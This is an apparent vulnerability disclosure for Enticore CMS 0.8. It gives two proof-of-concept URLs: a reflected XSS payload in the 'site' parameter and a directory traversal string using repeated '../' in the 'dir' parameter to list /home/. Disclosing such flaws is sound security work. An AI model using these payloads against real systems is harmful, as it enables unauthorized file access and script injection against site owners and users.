Enticore CMS 0.8 Directory Traversal (logged only)

Published / (Updated)
Credit
Risk
2011-09-27 / 2011-10-12
Jakub Galczyk
High
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

# Exploit Title: Enticore CMS Directory Traversal (logged only)
# Google Dork:
# Date: 24.09.2011
# Author: Jakub Galczyk /
# Software Link: http://sourceforge.net/projects/enticore/
# Version: 0.8
# Tested on: Ubuntu 10.10
# CVE :

PoC XSS:
http://enticore.sourceforge.net/index.php?plugin=EnticorePluginUpload&site=<script>alert(123)</script>&dir=yo

PoC DT:
http://enticore-0.8/index.php?plugin=EnticorePluginUpload&site=upload&dir=../../../../../../../../../../../../../home/

# best regards from
# http://hauntit.wordpress.com/
#
--
Jakub Ga?czyk

References:

http://sourceforge.net/projects/enticore/


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com